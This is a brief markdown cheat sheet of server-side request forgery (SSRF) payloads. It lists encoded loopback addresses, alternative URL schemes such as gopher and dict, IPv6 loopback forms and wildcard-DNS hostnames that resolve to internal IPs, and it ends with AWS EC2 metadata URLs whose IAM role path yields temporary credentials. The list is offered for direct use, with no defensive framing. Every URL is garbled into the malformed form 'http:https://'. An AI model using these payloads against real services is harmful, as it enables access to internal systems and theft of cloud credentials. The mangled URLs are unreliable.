ssrf.md

SSRF

http:https://0177.1/

http:https://0x7f.1/

http:https://127.000.000.1

https://520968996

Note: The latter can be calculated using http:https://www.subnetmask.info/

Exotic Handlers

gopher:https://, dict:https://, php:https://, jar:https://, tftp:https://

IPv6

http:https://[::1]

http:https://[::]

Wildcard DNS

10.0.0.1.xip.io
www.10.0.0.1.xip.io
mysite.10.0.0.1.xip.io
foo.bar.10.0.0.1.xip.io

Link: http:https://xip.io

10.0.0.1.nip.io
app.10.0.0.1.nip.io
customer1.app.10.0.0.1.nip.io
customer2.app.10.0.0.1.nip.io
otherapp.10.0.0.1.nip.io

Link: http:https://nip.io

AWS EC2 Metadata

http:https://169.254.169.254/latest/meta-data/  

http:https://169.254.169.254/latest/meta-data/local-hostname

http:https://169.254.169.254/latest/meta-data/public-hostname

If there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role [...]

Link: http:https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html (includes a comprehensive Instance Metadata Categories table)